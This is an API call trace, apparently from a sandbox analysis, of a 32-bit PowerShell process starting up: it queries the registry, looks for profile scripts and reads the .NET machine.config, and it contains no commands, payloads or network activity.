	[0178.612] RegCloseKey (hKey=0x300) returned 0x0
	[0178.612] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e62c | out: phkResult=0x14e62c*=0x300) returned 0x0
	[0178.612] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e674, lpData=0x0, lpcbData=0x14e670*=0x0 | out: lpType=0x14e674*=0x1, lpData=0x0, lpcbData=0x14e670*=0x56) returned 0x0
	[0178.612] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e674, lpData=0x721bd8, lpcbData=0x14e670*=0x56 | out: lpType=0x14e674*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e670*=0x56) returned 0x0
	[0178.612] RegCloseKey (hKey=0x300) returned 0x0
	[0178.614] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x721bd8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0178.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14e1c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0178.615] GetLastError () returned 0x3f0
	[0178.615] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x721bd8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0178.615] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14e1c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0178.615] GetLastError () returned 0x3f0
	[0178.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14e25c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0178.617] GetLastError () returned 0x3f0
	[0178.617] SetErrorMode (uMode=0x1) returned 0x1
	[0178.617] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14e6dc | out: lpFileInformation=0x14e6dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0178.617] GetLastError () returned 0x2
	[0178.617] SetErrorMode (uMode=0x1) returned 0x1
	[0178.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14e25c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0178.617] GetLastError () returned 0x2
	[0178.617] SetErrorMode (uMode=0x1) returned 0x1
	[0178.617] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14e6dc | out: lpFileInformation=0x14e6dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0178.617] GetLastError () returned 0x2
	[0178.617] SetErrorMode (uMode=0x1) returned 0x1
	[0178.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14e25c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0178.617] GetLastError () returned 0x2
	[0178.617] SetErrorMode (uMode=0x1) returned 0x1
	[0178.618] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14e6dc | out: lpFileInformation=0x14e6dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0178.618] GetLastError () returned 0x3
	[0178.618] SetErrorMode (uMode=0x1) returned 0x1
	[0178.618] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14e25c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0178.618] GetLastError () returned 0x3
	[0178.618] SetErrorMode (uMode=0x1) returned 0x1
	[0178.618] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14e6dc | out: lpFileInformation=0x14e6dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0178.618] GetLastError () returned 0x3
	[0178.618] SetErrorMode (uMode=0x1) returned 0x1
	[0178.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.619] GetLastError () returned 0xcb
	[0178.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.635] GetLastError () returned 0xcb
	[0178.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.724] GetLastError () returned 0xcb
	[0178.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.726] GetLastError () returned 0xcb
	[0178.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.727] GetLastError () returned 0xcb
	[0178.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.742] GetLastError () returned 0xcb
	[0178.742] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x300
	[0178.742] GetLastError () returned 0x0
	[0178.742] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3b4
	[0178.742] GetLastError () returned 0x0
	[0178.743] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0178.743] GetLastError () returned 0x0
	[0178.743] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328
	[0178.743] GetLastError () returned 0x0
	[0178.743] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x344
	[0178.743] GetLastError () returned 0x0
	[0178.743] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x350
	[0178.743] GetLastError () returned 0x0
	[0178.743] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x354
	[0178.743] GetLastError () returned 0x0
	[0178.743] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358
	[0178.743] GetLastError () returned 0x0
	[0178.743] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x35c
	[0178.743] GetLastError () returned 0x0
	[0178.744] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x360
	[0178.744] GetLastError () returned 0x0
	[0178.744] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b8
	[0178.744] GetLastError () returned 0x0
	[0178.744] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368
	[0178.744] GetLastError () returned 0x0
	[0178.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.747] GetLastError () returned 0xcb
	[0178.760] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0178.760] GetLastError () returned 0xcb
	[0178.822] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x14e71c | out: lpMode=0x14e71c) returned 1
	[0178.823] GetLastError () returned 0xcb
	[0178.824] SetEvent (hEvent=0x328) returned 1
	[0178.824] GetLastError () returned 0xcb
	[0178.824] SetEvent (hEvent=0x300) returned 1
	[0178.824] GetLastError () returned 0xcb
	[0178.824] SetEvent (hEvent=0x3b4) returned 1
	[0178.824] GetLastError () returned 0xcb
	[0178.824] SetEvent (hEvent=0x324) returned 1
	[0178.824] GetLastError () returned 0xcb
	[0178.824] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0178.824] GetLastError () returned 0x0
	[0178.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x721bd8, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0178.825] GetLastError () returned 0xcb
	[0178.826] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e580 | out: phkResult=0x14e580*=0x370) returned 0x0
	[0178.826] RegQueryValueExW (in: hKey=0x370, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14e5c8, lpData=0x0, lpcbData=0x14e5c4*=0x0 | out: lpType=0x14e5c8*=0x0, lpData=0x0, lpcbData=0x14e5c4*=0x0) returned 0x2

Thread:
	id = 111
	os_tid = 0x958


Thread:
	id = 113
	os_tid = 0x818


Thread:
	id = 116
	os_tid = 0x7ac


Thread:
	id = 118
	os_tid = 0x564


Thread:
	id = 119
	os_tid = 0x244

	[0102.247] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0152.321] LocalFree (hMem=0x7345a8) returned 0x0
	[0152.322] GetLastError () returned 0x0
	[0152.322] CloseHandle (hObject=0x344) returned 1
	[0152.322] GetLastError () returned 0x0
	[0152.322] CloseHandle (hObject=0x13) returned 1
	[0152.323] GetLastError () returned 0x0
	[0152.323] CloseHandle (hObject=0xf) returned 1
	[0152.324] GetLastError () returned 0x0
	[0152.324] RegCloseKey (hKey=0x328) returned 0x0
	[0152.324] RegCloseKey (hKey=0x324) returned 0x0
	[0152.324] RegCloseKey (hKey=0x320) returned 0x0
	[0152.324] LocalFree (hMem=0x7345c8) returned 0x0
	[0152.324] GetLastError () returned 0x0
	[0152.324] RegCloseKey (hKey=0x34c) returned 0x0
	[0160.430] RegCloseKey (hKey=0x34c) returned 0x0
	[0170.045] RegCloseKey (hKey=0x3c4) returned 0x0
	[0170.046] RegCloseKey (hKey=0x3a4) returned 0x0
	[0170.046] RegCloseKey (hKey=0x3a0) returned 0x0
	[0170.046] RegCloseKey (hKey=0x39c) returned 0x0
	[0170.047] RegCloseKey (hKey=0x398) returned 0x0
	[0170.047] RegCloseKey (hKey=0x394) returned 0x0
	[0170.047] RegCloseKey (hKey=0x390) returned 0x0
	[0170.047] RegCloseKey (hKey=0x38c) returned 0x0
	[0170.050] RegCloseKey (hKey=0x320) returned 0x0
	[0170.050] RegCloseKey (hKey=0x3c0) returned 0x0
	[0170.050] RegCloseKey (hKey=0x3bc) returned 0x0
	[0170.051] RegCloseKey (hKey=0x384) returned 0x0
	[0170.051] RegCloseKey (hKey=0x380) returned 0x0
	[0170.051] RegCloseKey (hKey=0x37c) returned 0x0
	[0170.052] RegCloseKey (hKey=0x378) returned 0x0
	[0170.052] RegCloseKey (hKey=0x374) returned 0x0
	[0170.052] RegCloseKey (hKey=0x370) returned 0x0
	[0170.052] RegCloseKey (hKey=0x36c) returned 0x0
	[0170.053] RegCloseKey (hKey=0x368) returned 0x0
	[0170.053] RegCloseKey (hKey=0x3b8) returned 0x0
	[0170.053] RegCloseKey (hKey=0x360) returned 0x0
	[0170.053] RegCloseKey (hKey=0x35c) returned 0x0
	[0170.054] RegCloseKey (hKey=0x358) returned 0x0
	[0170.054] RegCloseKey (hKey=0x354) returned 0x0
	[0170.054] RegCloseKey (hKey=0x350) returned 0x0
	[0170.054] RegCloseKey (hKey=0x344) returned 0x0
	[0170.055] RegCloseKey (hKey=0x328) returned 0x0
	[0170.055] RegCloseKey (hKey=0x324) returned 0x0
	[0170.055] RegCloseKey (hKey=0x3b4) returned 0x0
	[0170.055] RegCloseKey (hKey=0x300) returned 0x0
	[0170.055] RegCloseKey (hKey=0x34c) returned 0x0
	[0170.055] RegCloseKey (hKey=0x3b0) returned 0x0
	[0170.056] RegCloseKey (hKey=0x3ac) returned 0x0
	[0170.056] RegCloseKey (hKey=0x388) returned 0x0
	[0179.303] RegCloseKey (hKey=0x370) returned 0x0

Thread:
	id = 164
	os_tid = 0x524


Thread:
	id = 211
	os_tid = 0xbc8

	[0178.927] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0179.049] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0179.055] VirtualQuery (in: lpAddress=0x5fce130, lpBuffer=0x5fcf130, dwLength=0x1c | out: lpBuffer=0x5fcf130*(BaseAddress=0x5fce000, AllocationBase=0x5640000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0179.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.059] GetLastError () returned 0xcb
	[0179.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.063] GetLastError () returned 0xcb
	[0179.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.065] GetLastError () returned 0xcb
	[0179.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.085] GetLastError () returned 0xcb
	[0179.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.172] GetLastError () returned 0xcb
	[0179.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.173] GetLastError () returned 0xcb
	[0179.227] VirtualQuery (in: lpAddress=0x5fce24c, lpBuffer=0x5fcf24c, dwLength=0x1c | out: lpBuffer=0x5fcf24c*(BaseAddress=0x5fce000, AllocationBase=0x5640000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0179.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.227] GetLastError () returned 0xcb
	[0179.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.230] GetLastError () returned 0xcb
	[0179.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.230] GetLastError () returned 0xcb
	[0179.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.292] GetLastError () returned 0xcb
	[0179.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.508] GetLastError () returned 0xcb
	[0179.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.673] GetLastError () returned 0xcb
	[0179.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.675] GetLastError () returned 0xcb
	[0179.677] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.677] GetLastError () returned 0xcb
	[0179.679] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.679] GetLastError () returned 0xcb
	[0179.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.680] GetLastError () returned 0xcb
	[0179.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.683] GetLastError () returned 0xcb
	[0179.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.684] GetLastError () returned 0xcb
	[0179.805] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783738, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0179.805] GetLastError () returned 0xcb
	[0180.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0180.230] GetLastError () returned 0xcb
	[0180.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0180.296] GetLastError () returned 0xcb
	[0180.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x783790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0180.300] GetLastError () returned 0xcb
	[0186.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5fce6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.340] GetLastError () returned 0xcb
	[0186.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5fce6a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.340] GetLastError () returned 0xcb
	[0186.440] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x785a28, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0186.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5fce72c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0186.440] GetLastError () returned 0x0
	[0186.532] GetCurrentProcess () returned 0xffffffff
	[0186.532] GetLastError () returned 0x3f0
	[0186.532] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5fce840 | out: TokenHandle=0x5fce840*=0x370) returned 1
	[0186.532] GetLastError () returned 0x3f0
	[0186.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x5fce3d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
	[0186.541] GetLastError () returned 0x0
	[0186.543] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5fce880 | out: lpFileInformation=0x5fce880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1
	[0186.543] GetLastError () returned 0x0
	[0186.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5fce398, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
	[0186.548] GetLastError () returned 0x0
	[0186.553] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5fce87c | out: lpFileInformation=0x5fce87c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf973529, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf973529, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xc2c74ba0, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x60ed)) returned 1
	[0186.553] GetLastError () returned 0x0
	[0186.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5fce2e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43
	[0186.553] GetLastError () returned 0x0
	[0186.553] SetErrorMode (uMode=0x1) returned 0x1
	[0186.553] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3c0
	[0186.553] GetLastError () returned 0x0
	[0186.553] GetFileType (hFile=0x3c0) returned 0x1
	[0186.553] SetErrorMode (uMode=0x1) returned 0x1
	[0186.554] GetFileType (hFile=0x3c0) returned 0x1
	[0186.558] GetFileSize (in: hFile=0x3c0, lpFileSizeHigh=0x5fce850 | out: lpFileSizeHigh=0x5fce850*=0x0) returned 0x60ed
	[0186.558] GetLastError () returned 0x0
	[0186.558] ReadFile (in: hFile=0x3c0, lpBuffer=0x2c32634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fce808, lpOverlapped=0x0 | out: lpBuffer=0x2c32634*, lpNumberOfBytesRead=0x5fce808*=0x1000, lpOverlapped=0x0) returned 1
	[0186.558] GetLastError () returned 0x0
	[0186.642] ReadFile (in: hFile=0x3c0, lpBuffer=0x2c32634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fce4c0, lpOverlapped=0x0 | out: lpBuffer=0x2c32634*, lpNumberOfBytesRead=0x5fce4c0*=0x1000, lpOverlapped=0x0) returned 1
	[0186.642] GetLastError () returned 0x0
	[0186.643] ReadFile (in: hFile=0x3c0, lpBuffer=0x2c32634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fce4c0, lpOverlapped=0x0 | out: lpBuffer=0x2c32634*, lpNumberOfBytesRead=0x5fce4c0*=0x1000, lpOverlapped=0x0) returned 1
	[0186.643] GetLastError () returned 0x0
	[0186.643] ReadFile (in: hFile=0x3c0, lpBuffer=0x2c32634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fce4c0, lpOverlapped=0x0 | out: lpBuffer=0x2c32634*, lpNumberOfBytesRead=0x5fce4c0*=0x1000, lpOverlapped=0x0) returned 1
	[0186.643] GetLastError () returned 0x0
	[0186.644] ReadFile (in: hFile=0x3c0, lpBuffer=0x2c32634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fce4c0, lpOverlapped=0x0 | out: lpBuffer=0x2c32634*, lpNumberOfBytesRead=0x5fce4c0*=0x1000, lpOverlapped=0x0) returned 1
	[0186.644] GetLastError () returned 0x0
	[0186.651] ReadFile (in: hFile=0x3c0, lpBuffer=0x2c32634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fce5f4, lpOverlapped=0x0 | out: lpBuffer=0x2c32634*, lpNumberOfBytesRead=0x5fce5f4*=0x1000, lpOverlapped=0x0) returned 1
	[0186.652] GetLastError () returned 0x0
	[0186.652] ReadFile (in: hFile=0x3c0, lpBuffer=0x2c32634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fce488, lpOverlapped=0x0 | out: lpBuffer=0x2c32634*, lpNumberOfBytesRead=0x5fce488*=0xed, lpOverlapped=0x0) returned 1
	[0186.652] GetLastError () returned 0x0
	[0186.652] ReadFile (in: hFile=0x3c0, lpBuffer=0x2c32634, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5fce540, lpOverlapped=0x0 | out: lpBuffer=0x2c32634*, lpNumberOfBytesRead=0x5fce540*=0x0, lpOverlapped=0x0) returned 1
	[0186.652] GetLastError () returned 0x0
	[0186.652] CloseHandle (hObject=0x3c0) returned 1
	[0186.652] GetLastError () returned 0x0
	[0186.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5fce6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.764] GetLastError () returned 0x0
	[0186.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5fce6a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0186.765] GetLastError () returned 0x0
	[0186.765] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x785a28, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0186.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5fce72c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
